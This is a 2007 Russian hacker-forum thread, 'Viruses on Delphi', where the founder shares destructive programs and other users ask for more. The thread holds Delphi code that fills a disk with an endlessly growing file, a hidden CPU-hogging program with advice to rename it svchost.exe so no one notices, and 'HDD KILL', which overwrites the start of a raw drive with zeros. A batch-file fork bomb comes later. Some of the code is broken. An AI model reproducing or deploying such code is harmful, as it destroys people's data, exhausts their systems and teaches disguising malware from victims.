Мы переехали http://www.webxakep.net

Воскресенье, 22.12.2024
На главную · Регистрация · Войти · Пользователи · User`Bars · Обратная связь · WebTools · Последние сообщения · Поиск

  • Страница 1 из 1
  • 1
Модератор форума: 3xstie  
Вирусы на Delphi

4RXRU5HДата: Понедельник, 26.03.2007, 17:29 | Сообщение # 1
0xFFFFFFF
Группа: Основатель
Сообщений:271
Статус: Offline
Этот вирь создаёт txt файл и начинает бесконечный цикл заполнения внутренности файла , таким образом файл растёт в размере , есле есть опыт то можно сделать этот вирь невидимым для глаз и всего остального

Ниже код на Delphi
------------------------------------------------------------------------------------------------

Code
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls;
type
TForm1 = class(TForm)
Button1: TButton;
procedure Button1Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
procedure TForm1.Button1Click(Sender: TObject);
var
fs: TFileStream;
x:string;
begin
x:='12345678980';
fs := TFileStream.Create('c:\1.txt', fmCreate);
while true do begin
fs.Write(x, length(x));
end;
end;
end.




Сообщение отредактировал Rush - Понедельник, 26.03.2007, 18:37
 


4RXRU5HДата: Понедельник, 26.03.2007, 17:50 | Сообщение # 2
0xFFFFFFF
Группа: Основатель
Сообщений:271
Статус: Offline
Этот вирус прост в своей работе но хорош на деле .
Описание : при его запуске Загрузка ЦП подскакивает на 50% и он невидим в Диспетчере Задач , но видим в процессах. Есле его переименовать например в
svchost.exe то не кто не догадается что это вирь потомучто там файлов с таким названием много !

Ниже код на Delphi
------------------------------------------------------------------------------------------------

Code
program OVERDRIVE;

uses
registry,Windows;
var
Msg :TMsg;
begin
while GetMessage(Msg,Hinstance,0,0) do
begin
TranslateMessage(msg);
DispatchMessage(msg);
end;
end.

{$R *.res}

begin
Application.Initialize;
Application.Run;
end;
begin
ShowWindow(Handle,SW_HIDE);
ShowWindow(Application.Handle,SW_HIDE);
end;
var
r: array of integer;
i: integer;
cicle:string;
begin
repeat
Setlength(r,99); // OVERDRIVE-7 V.02
for i:=0 to high(r )-1 do
begin
r[i]:=i*i*i*i*i*i*i;
until
true;
end;
end.





Сообщение отредактировал Rush - Понедельник, 26.03.2007, 18:38
 


4RXRU5HДата: Понедельник, 26.03.2007, 17:57 | Сообщение # 3
0xFFFFFFF
Группа: Основатель
Сообщений:271
Статус: Offline
Вирус под названием --- HDD KILL --.
Название говорит само за себя.

Код на Delphi
------------------------------------------------------------------------------------------------

Code
program HDDKill;
{$APPTYPE CONSOLE}

uses Windows, SysUtils;
Const
BuffSize = 512 * 1024;
Var
hVol: THandle;
pMemBuff: Pointer;
Writed: DWORD;
anAnswer: String;
begin
If (ParamCount <> 1) Or (Length(ParamStr(1)) <> 2) Or (ParamStr(1)[2] <> ':') Then
Begin
WriteLn('Error: invalid input parameter. Sample using: "HDDKill C:"');
Halt;
End;
Write('Are you shure you want to kill drive ', ParamStr(1), ' ??? Enter "Y" to continue... ');
ReadLn(anAnswer);
If anAnswer <> 'Y' Then Halt;
hVol := CreateFile(PChar('\\.\' + ParamStr(1)), GENERIC_WRITE, FILE_SHARE_READ Or FILE_SHARE_WRITE, Nil, OPEN_EXISTING, 0, 0);
If hVol = INVALID_HANDLE_VALUE Then RaiseLastWin32Error;
GetMem(pMemBuff, BuffSize);
Writed := 0;
WriteLn('Writing...');
If Not WriteFile(hVol, pMemBuff^, BuffSize, Writed, Nil) Then RaiseLastWin32Error;
WriteLn;
WriteLn(Writed, ' bytes of zeros was written at beginning of drive ', ParamStr(1));
Except
On E: Exception Do
Begin
WriteLn('Exception class "' + E.ClassName + '" occured with message "' + E.Message + '".');
WriteLn('Program terminated');
End;
End;
end.





Сообщение отредактировал Rush - Понедельник, 26.03.2007, 18:54
 


DDosT™Дата: Четверг, 12.04.2007, 02:22 | Сообщение # 4
Группа: Удаленные





Хоть бы привёл код по правилам хорошего стиля в нормальный вид smile

Сообщение отредактировал DDosT - Четверг, 12.04.2007, 02:23
 


4RXRU5HДата: Четверг, 12.04.2007, 17:58 | Сообщение # 5
0xFFFFFFF
Группа: Основатель
Сообщений:271
Статус: Offline
Не зачем этого делать , выкладывайте свои разоботки господа вирусологи. deal

 


zerokillДата: Суббота, 21.04.2007, 17:48 | Сообщение # 6
Рядовой
Группа: Новенькие
Сообщений:12
Статус: Offline
HDD KILL рулит , надо попробовать на вертуальной машине ))))))
с дельфи не работал,в основном на с++ и на php? поэтому прозьба расказать чем компилировать и вылажите плиз компилятор )))))
Если выложите, прикрепите его где нибуть здесь. чтобы можно было его всегда скачать. Это я к тому, что я часто сижу за чужими компами а к своей машине доступ ни всегда имею.


Сообщение отредактировал zerokill - Суббота, 21.04.2007, 17:51
 


EsmiraldaДата: Понедельник, 23.04.2007, 16:58 | Сообщение # 7
Полковник
Группа: Новенькие
Сообщений:153
Статус: Offline
Quote (zerokill)
с дельфи не работал,в основном на с++ и на php?

может сможешь помочь с литературой по пхп??


Хакером можешь ты не быть, но знать компьютер ты обязан))

 


DDosT™Дата: Понедельник, 23.04.2007, 17:27 | Сообщение # 8
Группа: Удаленные





По поводу PHP, самая хорошая книга "Самоучитель PHP5" Максим Кузнецов, Игорь Симдянов
 


EsmiraldaДата: Понедельник, 23.04.2007, 17:30 | Сообщение # 9
Полковник
Группа: Новенькие
Сообщений:153
Статус: Offline
Благодарю)) А то систр решила заняться ПхП))

Хакером можешь ты не быть, но знать компьютер ты обязан))

 


ArxWolfДата: Суббота, 09.06.2007, 09:41 | Сообщение # 10
Administration Men
Группа: Основатель
Сообщений:184
Статус: Offline
biggrin



 


xxARCHERxxДата: Воскресенье, 23.12.2007, 16:12 | Сообщение # 11
Рядовой
Группа: Новенькие
Сообщений:13
Статус: Offline
а обязательно писать этот вирус на дельфи?
а можна у блокноте?
если нет то плиз напишите для блокнота вирус.
 


4RXRU5HДата: Воскресенье, 23.12.2007, 18:06 | Сообщение # 12
0xFFFFFFF
Группа: Основатель
Сообщений:271
Статус: Offline
Quote (xxARCHERxx)
а обязательно писать этот вирус на дельфи?

biggrin есесно да )))
ЗЫ ша чёнить придумаем для блокнота ))


 


4RXRU5HДата: Воскресенье, 23.12.2007, 18:13 | Сообщение # 13
0xFFFFFFF
Группа: Основатель
Сообщений:271
Статус: Offline
а вот что мона зделать с блокнотом )
открываеш блокнот. пишеш туда

Code
@echo off  
:metka
@start webxakep.bat  
@goto metka

сохраняеш с расширением webxakep.bat тоесть *bat
PS Уже писал статью увидеть можно тут http://webxakep.net/publ/1-1-0-7


 


xxARCHERxxДата: Воскресенье, 23.12.2007, 20:55 | Сообщение # 14
Рядовой
Группа: Новенькие
Сообщений:13
Статус: Offline
arXRush, ну написал а сохранить как (*txt или все файлы).
а после сохранения как проверить работает или нет?

Добавлено (23.12.2007, 20:15)
---------------------------------------------
я имел виду тип файла какой сохранить?

Добавлено (23.12.2007, 20:55)
---------------------------------------------
кинь плиз сылку где можна научиться языку програмируваня плиз (я знаю что нельзя просить что б кто нибудь кидал сылки но сёравно кинь плиз я уже почти весь нет облазил а нашол токо мусор) токо (html) не нада я его уже знаю.

 


4RXRU5HДата: Понедельник, 24.12.2007, 06:46 | Сообщение # 15
0xFFFFFFF
Группа: Основатель
Сообщений:271
Статус: Offline
xxARCHERxx, тут http://webxakep.net/forum/63-25-1 достаточно ссылок на литературу про С++ этого тебе хватит для изучения языка программирования

 

  • Страница 1 из 1
  • 1
Поиск:
..:WX Group:..
WebXakep 2007 - 2008 year.
Desing by arXRush & ArxWolf :)
Все прова принадлежат ArxWolf © Webxakep.net, все представленные материалы на портале в целях ознакомления.[Хакерство и Безопасность]
Форум посвящённый сетевой безопасности, хакерству, исследованию, проникновению. Есть темы такие как : Основы новичкам, BUGTRAQ, ICQ, Email, IRC, Skype, MSN, Крякерам, Фрикерам, Мобильные устройства, Вирусология, Кодинг, ОС, Soft, Халява, ЖелезО, Купля, Продажа, Обмен, Трёпка, Книги, Статьи, Новости, Группировки, Взлом.

Rambler's Top100